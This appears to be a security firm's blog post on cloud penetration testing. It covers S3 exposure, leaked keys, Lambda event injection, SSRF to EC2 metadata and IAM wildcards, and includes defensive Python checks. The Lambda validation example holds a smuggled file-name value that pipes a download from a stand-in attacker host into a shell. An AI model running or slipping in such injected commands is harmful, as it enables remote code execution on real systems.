Should I pentest my cloud infrastructure? RE: Why the heck haven’t you done it yet?!

It is true that migrating your business to the cloud mitigates a lot of risks compared to a monolithic architecture. Thanks to the shared responsibility model, you don’t have to worry about patching the underlying host systems or about the physical security of the hosting servers, because that is handled by the cloud service provider. However, you have to remember that when you decide to use cloud services, security IN the cloud is your responsibility, which means you are responsible for who can access your cloud services and data, and how.

Configuring your cloud in a secure way isn’t a trivial task. Recent incidents, such as the exposure of FedEx customers’ personal data or the compromise of Tesla’s cloud resources for mining cryptocurrencies, are perfect examples of small misconfigurations that can give you sleepless nights. There are more and more such stories, involving small startups and big companies alike. According to a Gartner report:

Through 2022, at least 95% of cloud security failures will be the customer’s fault.

While it is quite common to perform periodic security assessments of your local network, it is really rare to find a company that puts the same effort into testing the security of its cloud. We have to understand the new threats and risks that have appeared with the cloud, and how we should adjust our approach to cloud security testing.

What cloud possibly go wrong?

Data Breaches

Since the very beginning of the AWS S3 service, we have observed a real plague of sensitive data exposed through misconfigured storage. As you can see in our research, finding a public bucket isn’t a tough task, and even though it’s a big security no-no, a lot of DevOps still assign open access to their data. Sometimes it’s because of a small mistake in the CloudFormation template; sometimes buckets are public because an engineer didn’t have time to adjust the permissions. If it isn’t monitored, DevOps aren’t even aware of the issue.

Do you monitor your environment to prevent such improper configuration?

Will you quickly detect it if one of your DevOps mistakenly sets the wrong permissions on a bucket or its objects?
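One way to start answering these questions is to review bucket policies automatically. Below is a minimal sketch, assuming you have already exported a bucket policy as a JSON string. The function name `public_statements`, the bucket name and the account ID are made up for illustration. It only flags unconditioned `Allow` statements open to everyone and does not look at ACLs or account-level settings.

```python
import json


def public_statements(policy_json: str) -> list:
    """Return the Allow statements that grant access to everyone."""
    policy = json.loads(policy_json)
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may not be wrapped in a list
        statements = [statements]

    flagged = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal")
        # "*" and {"AWS": "*"} both mean "anyone"
        aws = principal.get("AWS") if isinstance(principal, dict) else principal
        is_anyone = aws == "*" or (isinstance(aws, list) and "*" in aws)
        # A Condition may narrow the grant, so only unconditioned grants are flagged
        if is_anyone and "Condition" not in stmt:
            flagged.append(stmt)
    return flagged


# Hypothetical policy: one public statement, one restricted to a single role
EXAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Sid": "TeamOnly", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111122223333:role/example-role"},
         "Action": "s3:PutObject", "Resource": "arn:aws:s3:::example-bucket/*"},
    ],
})

print([s["Sid"] for s in public_statements(EXAMPLE_POLICY)])  # ['PublicRead']
```

Running a check like this on a schedule, rather than once, is what turns it into monitoring.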

Leaking access keys

Let’s say you write a script that operates on AWS. To make it work, you have to store the AWS keys somewhere so the script can authenticate its operations. Unfortunately, some DevOps decide to hardcode them and then accidentally share them. Even if your engineers know better than to do that, a key leak can still be caused by your contractor or… an applicant who wants to work for you.

How do you manage your access keys?

What mechanisms do you use to detect improper usage of keys?
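A simple detection mechanism is to scan code for strings that look like access key IDs before it gets shared. The sketch below assumes the common format of long-term IAM access key IDs (the `AKIA` prefix followed by 16 uppercase letters or digits). The function name `find_access_key_ids` is made up for illustration, and the sample uses the placeholder key from the AWS documentation.

```python
import re

# Long-term IAM access key IDs: "AKIA" followed by 16 uppercase letters or digits
ACCESS_KEY_ID = re.compile(r"\b(AKIA[0-9A-Z]{16})\b")


def find_access_key_ids(text: str) -> list:
    """Return (line_number, key_id) pairs for every access key ID found in text."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        for match in ACCESS_KEY_ID.finditer(line):
            hits.append((number, match.group(1)))
    return hits


SAMPLE = '''import os
region = "eu-west-1"
aws_access_key_id = "AKIAIOSFODNN7EXAMPLE"  # placeholder key from the AWS documentation
'''

print(find_access_key_ids(SAMPLE))  # [(3, 'AKIAIOSFODNN7EXAMPLE')]
```

A pattern match like this catches only the key ID, not the secret, and it will miss keys that are encoded or split across lines, so treat it as a first filter rather than a guarantee.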

Event injection attacks

Serverless services like AWS Lambda or Azure Functions bring totally new opportunities, but also new threats. One of them is a new attack vector: event injection. Data now enters a serverless function through an event; for example, a user can pass data to Lambda by sending an email, uploading a file to an S3 bucket or pushing an AWS IoT Button. This requires reconsidering the threat model and taking the new injection points into account. Just take a look at this video to see how an attacker can inject malicious input into a Lambda function using just an email and a malformed PDF file:

Do you audit your Lambda code?
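When auditing such code, a good first question is whether the function treats event fields as untrusted input. Here is a minimal sketch of one defensive pattern, assuming a function triggered by S3 uploads that should only ever process PDF files. The allowlist, the helper names `extract_safe_keys` and `make_event`, and the bucket name are assumptions for illustration.

```python
import re
from urllib.parse import unquote_plus

# Assumed allowlist: letters, digits, "_", "-", "/" and ".", ending in ".pdf"
SAFE_KEY = re.compile(r"[A-Za-z0-9_\-/.]+\.pdf")


def extract_safe_keys(event: dict) -> list:
    """Return decoded object keys from an S3 event, rejecting anything off the allowlist."""
    keys = []
    for record in event.get("Records", []):
        # Object keys arrive URL-encoded in S3 event notifications
        key = unquote_plus(record["s3"]["object"]["key"])
        if not SAFE_KEY.fullmatch(key) or ".." in key:
            raise ValueError(f"rejected suspicious object key: {key!r}")
        keys.append(key)
    return keys


def make_event(key: str) -> dict:
    """Build a minimal S3-style event for demonstration purposes."""
    return {"Records": [{"s3": {"bucket": {"name": "example-bucket"},
                                "object": {"key": key}}}]}


print(extract_safe_keys(make_event("invoices/2018/report.pdf")))

try:
    # The encoded key decodes to a file name with shell metacharacters in it
    extract_safe_keys(make_event("x.pdf%3B+curl+attacker.example+%7C+sh"))
except ValueError as error:
    print(error)
```

Validating the key does not make it safe to paste into a shell command or a query; it only narrows what reaches the rest of the function.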

Denial of Wallet

“I don’t care about DoS. Dude, I’m using serverless 😎”: that’s what you may hear from DevOps. That is true, because each request is handled in a separate Lambda instance, so there’s no worry that a malformed loop will consume all of the resources. However, you have to bear in mind that YOU are paying for handling those requests. Sending millions of such requests can greatly impact your bill, so in the cloud world Denial of Service has evolved into Denial of Wallet.

Do you implement any mechanisms to prevent such scenarios?

Do you set billing alerts?
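To get a feeling for the numbers, it helps to estimate what a flood of requests would cost. The sketch below assumes a pricing model with a per-request fee plus a fee per GB-second of compute. The function name and the prices passed in are illustrative placeholders, not current pricing, so substitute the figures from your provider’s price list.

```python
def estimate_invocation_cost(requests: int,
                             avg_duration_s: float,
                             memory_gb: float,
                             price_per_million_requests: float,
                             price_per_gb_second: float) -> float:
    """Estimate the cost of serving a number of function invocations."""
    request_cost = requests / 1_000_000 * price_per_million_requests
    compute_cost = requests * avg_duration_s * memory_gb * price_per_gb_second
    return request_cost + compute_cost


# Assumed attack: 100 million requests, each keeping a 1 GB function busy for 1 second
cost = estimate_invocation_cost(
    requests=100_000_000,
    avg_duration_s=1.0,
    memory_gb=1.0,
    price_per_million_requests=0.20,    # placeholder price
    price_per_gb_second=0.0000166667,   # placeholder price
)
print(f"Estimated cost: ${cost:.2f}")
```

Comparing such an estimate with your billing alert threshold shows how quickly an attacker could cross it.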

SSRF/XXE/unintended proxy

Vulnerabilities like SSRF or XXE can turn your endpoint into a proxy that forwards requests to another endpoint. This is especially dangerous in the cloud, because an attacker can use such a vulnerability in an application to read the AWS access keys and STS tokens of the role assigned to the hosting instance.

For better understanding, let me show you a quick demo: an application which is hosted on an EC2 instance and has a “feature” to forward a request to any other website. Let’s see how it can be used by an attacker:

Imagine the following scenario: your application has been tested multiple times (so it’s free from any medium- or high-severity vulnerabilities) and you decide to host it in the cloud. Nothing risky, huh? Well, the guys from Phabricator thought the same. They assigned an informative severity to an SSRF vulnerability, because before the migration there had been no real risk from exploiting this bug. However, after the migration the same vulnerability allowed an attacker to access the EC2 metadata, which contains the access keys assigned to the EC2 role.

Have your applications been tested against such vulnerabilities?
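If an application really has to fetch user-supplied URLs, one common mitigation is to refuse targets that resolve to internal addresses, including the link-local address 169.254.169.254 used by the EC2 metadata service. Below is a minimal sketch of such a check. The function names are made up for illustration, and the `resolve` parameter exists only so the example can run without real DNS lookups.

```python
import ipaddress
import socket
from urllib.parse import urlparse


def resolve_host(host: str) -> list:
    """Resolve a host name to the IP addresses it points to."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_internal_target(url: str, resolve=resolve_host) -> bool:
    """Return True if the URL points at a loopback, private or link-local address."""
    host = urlparse(url).hostname
    if host is None:
        return True  # no host to check, so refuse by default
    try:
        addresses = [ipaddress.ip_address(host)]  # host is already an IP literal
    except ValueError:
        addresses = [ipaddress.ip_address(a) for a in resolve(host)]
    return any(
        a.is_loopback or a.is_private or a.is_link_local or a.is_unspecified
        for a in addresses
    )


print(is_internal_target("http://169.254.169.254/latest/meta-data/"))  # True
print(is_internal_target("http://8.8.8.8/"))                           # False
# Hypothetical host name that an attacker points at the metadata address
print(is_internal_target("http://metadata.example/",
                         resolve=lambda host: ["169.254.169.254"]))    # True
```

A check like this is not complete on its own: redirects and DNS answers that change between the check and the actual request can still bypass it, which is exactly the kind of thing a pentest should verify.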

Improper rights

Although everybody has heard about the least privilege principle, following it isn’t so common. There are a lot of possible permissions, and assigning only the required ones takes more time, so it’s quite tempting for busy DevOps to put in a wildcard and forget about the problem. Whether the excuse is “because it works” or “it’s only temporary and I forgot to remove those permissions”, overly permissive policies may allow dangerous actions or even privilege escalation.

Do you audit permissions of your users?

Are you aware of what exactly your users can do?
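A quick first pass over your permissions is to look for wildcards in IAM policy documents. The sketch below assumes the policy has already been loaded into a Python dictionary. The function names and the example policy are made up for illustration, and the check is deliberately crude: it does not evaluate conditions, `NotAction` or partial wildcards such as `s3:Get*`.

```python
def as_list(value) -> list:
    """IAM allows a single value or a list in most fields; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def wildcard_findings(policy: dict) -> list:
    """Return (statement_index, field, value) for every wildcard in Allow statements."""
    findings = []
    for index, stmt in enumerate(as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        for action in as_list(stmt.get("Action")):
            # "*" allows everything; "service:*" allows every action of one service
            if action == "*" or action.endswith(":*"):
                findings.append((index, "Action", action))
        for resource in as_list(stmt.get("Resource")):
            if resource == "*":
                findings.append((index, "Resource", resource))
    return findings


# Hypothetical policy: the second statement is the "temporary" wildcard
EXAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Effect": "Allow", "Action": ["iam:*"], "Resource": "*"},
    ],
}

print(wildcard_findings(EXAMPLE_POLICY))
# [(1, 'Action', 'iam:*'), (1, 'Resource', '*')]
```

Every finding is a prompt for a question, not a verdict: some wildcards are justified, but each one should have an owner who can explain it.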

BTW. Have you noticed that there is a typo in the section title? It’s just the same with cloud misconfigurations. Some are quite obvious but still difficult to spot if you are not aware.

How badly would it end?

Imagine an attacker who gets credentials to your application deployed in your local test environment. Access to test data in a separate network segment: it doesn’t sound really scary, does it? Now, let’s move this scenario to the cloud: an attacker has got credentials to an AWS account used only for testing purposes. The attacker still has no access to your customer data, BUT… with those credentials they can start arbitrary AWS services, e.g. run the biggest EC2 instances for crypto mining, and guess who is going to pay for it? 😉

If an attacker has enough permissions (or can escalate them), they are able to delete all your cloud resources. Code Spaces has already learnt how thrilling that can be: in a short time an attacker managed to remove most of its resources, including backups, and the company simply stopped existing.

Even a small mistake in assigning permissions to one of your S3 buckets or its objects can be deadly for your company. Exposing personal data means not only reputation problems; under various regulations, e.g. the European Union’s GDPR data privacy legislation, it may also result in really high fines.

Cloud security assessment — not a luxury but a necessity

A cloud security assessment should start with an analysis of your cloud services architecture. At this step, it is important to detect any design flaws. It’s also a good time to verify that the designed architecture reflects the real environment, for example that you aren’t paying for some little crypto miner working in the background as an extra salary bonus for one of your team members.

Then it’s time to analyze the compliance of each service with the AWS security best practices. The priority for DevOps is usually to get a stable environment which works properly. However, following best practices usually means spending extra time and effort, so this task often ends up on the list of “things to do when I have more time”. An example of a test here is verifying IAM permissions: whether the least privilege principle is being followed, whether there are any unused permissions, and whether it is possible to escalate privileges.

A separate point is pentesting services like EC2, RDS, Aurora, CloudFront, API Gateway, Lambda and Lightsail, or performing DNS zone walking, because you may need approval from Amazon to do it; AWS has revised its penetration testing policy over time, so check the current version before you start. Testing those services usually requires sending a lot of malformed requests, for example to find a way to inject some code into your Lambda or to reach EC2 metadata from an application hosted on the EC2 instance. Obviously, Amazon would like to know if they should expect such unusual traffic.

Summary

A new era of cloud services gives us great opportunities, but new threats, too. Blinded by great effectiveness, scalability and ease of use, we often forget that we entrust the security of our data to a small group of DevOps responsible for configuring our cloud kingdom. While environment reliability is the main priority, security best practices are sometimes moved down the “to do” list. This is why it is so important to test cloud security with a totally different mindset: How can an attacker or a dishonest employee benefit from this configuration? Would my monitoring process detect such anomalies?



A comprehensive security assessment of cloud services should not only detect vulnerabilities, but also verify that your cloud infrastructure is designed and configured in line with best practices. That being said, such an assessment should include the following:

- architecture review

- configuration review

- pentesting sensitive services

- verification of monitoring processes

Interested in cloud security assessment? Check out our offer.